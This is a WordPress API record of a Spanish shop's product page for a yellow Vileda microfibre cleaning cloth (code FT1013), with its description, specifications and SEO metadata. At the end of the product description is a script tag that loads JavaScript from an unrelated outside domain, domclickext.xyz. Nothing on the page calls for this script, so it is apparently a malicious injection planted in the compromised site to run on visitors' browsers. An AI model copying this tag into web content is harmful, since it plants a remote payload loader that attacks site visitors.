{"id":10374,"date":"2019-09-11T14:56:52","date_gmt":"2019-09-11T13:56:52","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=10374"},"modified":"2019-10-30T11:39:05","modified_gmt":"2019-10-30T11:39:05","slug":"bayeta-contract-vileda-amarilla","status":"publish","type":"product","link":"https:\/\/meprolim.es\/fr\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas-fr\/bayetas-microfibra-bayetas-fr-2\/contract-fr\/bayeta-contract-vileda-amarilla\/","title":{"rendered":"BAYETA CONTRACT VILEDA AMARILLA &#8211; C\u00d3DIGO: FT1013"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p>Limpieza Superior:<\/p>\n<p>Al estar compuesta por microfibras, arranca la suciedad desde la base, sin dejar rastros ni pelusa. En seco o ligeramente humedecida, es capaz de eliminar las suciedades m\u00e1s incrustadas, tales como la grasa pr\u00e1cticamente sin esfuerzo<\/p>\n<p>Rentabilidad:<\/p>\n<p>Gamuza de tela sin tejer de gran duraci\u00f3n, permitiendo m\u00e1s de 100 lavados hasta 95oC sin perder sus propiedades. La naturaleza de sus fibras permite limpiar con mucho menos producto qu\u00edmico, permitiendo as\u00ed un considerable ahorro durante su vida \u00fatil.<\/p>\n<p>Multiuso:<\/p>\n<p>Id\u00f3nea para todo tipo de superficie Excelentes resultados en la limpieza de metales. Apta para aquellas \u00e1reas de trabajo que requieran alta capacidad de limpieza con un buen acabado.<\/p>\n<p>Una de las mejores relaciones CALIDAD-PRECIO del mercado.<\/p>\n<p>&nbsp;<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>\u2022 Excelente rendimiento en metales.<\/p>\n<p>\u2022 Hasta 200 lavados.<\/p>\n<p>\u2022 Lavable hasta 95\u00ba C.<\/p>\n<p>\u2022 Dim.: 40 x 40 cm.<\/p>\n<p>\u2022 Caja 600 bayetas.<\/p>\n<p>\u2022 Color amarillo.<\/p>\n<p><strong>SKU: FT1013<\/strong><\/p>\n","protected":false},"featured_media":10375,"template":"","meta":[],"product_brand":[],"product_cat":[1069,1070,102,1071],"product_tag":[921],"class_list":{"0":"post-10374","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-bayetas","7":"product_cat-bayetas-microfibra-bayetas","8":"product_cat-carros-de-servicio-fregado-manual-y-articulos-de-limpieza","9":"product_cat-contract","10":"product_tag-bayetas-microfibra","12":"first","13":"instock","14":"shipping-taxable","15":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>BAYETA CONTRACT VILEDA AMARILLA - C\u00d3DIGO: FT1013 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BAYETA CONTRACT VILEDA AMARILLA - C\u00d3DIGO: FT1013 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"\u2022 Excelente rendimiento en metales. \u2022 Hasta 200 lavados. \u2022 Lavable hasta 95\u00ba C. \u2022 Dim.: 40 x 40 cm. \u2022 Caja 600 bayetas. \u2022 Color amarillo. SKU: FT1013\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2019-10-30T11:39:05+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1013.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/\",\"name\":\"BAYETA CONTRACT VILEDA AMARILLA - C\u00d3DIGO: FT1013 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FT1013.jpg\",\"datePublished\":\"2019-09-11T13:56:52+00:00\",\"dateModified\":\"2019-10-30T11:39:05+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FT1013.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/FT1013.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\\\/bayetas\\\/bayetas-microfibra-bayetas\\\/contract\\\/bayeta-contract-vileda-amarilla\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Catalogue\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/catalogue\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"BAYETA CONTRACT VILEDA AMARILLA &#8211; C\u00d3DIGO: FT1013\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"BAYETA CONTRACT VILEDA AMARILLA - C\u00d3DIGO: FT1013 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/","og_locale":"fr_FR","og_type":"article","og_title":"BAYETA CONTRACT VILEDA AMARILLA - C\u00d3DIGO: FT1013 - Meprolim","og_description":"\u2022 Excelente rendimiento en metales. \u2022 Hasta 200 lavados. \u2022 Lavable hasta 95\u00ba C. \u2022 Dim.: 40 x 40 cm. \u2022 Caja 600 bayetas. \u2022 Color amarillo. SKU: FT1013","og_url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/","og_site_name":"Meprolim","article_modified_time":"2019-10-30T11:39:05+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1013.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/","url":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/","name":"BAYETA CONTRACT VILEDA AMARILLA - C\u00d3DIGO: FT1013 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1013.jpg","datePublished":"2019-09-11T13:56:52+00:00","dateModified":"2019-10-30T11:39:05+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1013.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/FT1013.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/carros-de-servicio-fregado-manual-y-articulos-de-limpieza\/bayetas\/bayetas-microfibra-bayetas\/contract\/bayeta-contract-vileda-amarilla\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/fr\/"},{"@type":"ListItem","position":2,"name":"Catalogue","item":"https:\/\/meprolim.es\/fr\/catalogue\/"},{"@type":"ListItem","position":3,"name":"BAYETA CONTRACT VILEDA AMARILLA &#8211; C\u00d3DIGO: FT1013"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product\/10374","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media\/10375"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media?parent=10374"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_brand?post=10374"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_cat?post=10374"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_tag?post=10374"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}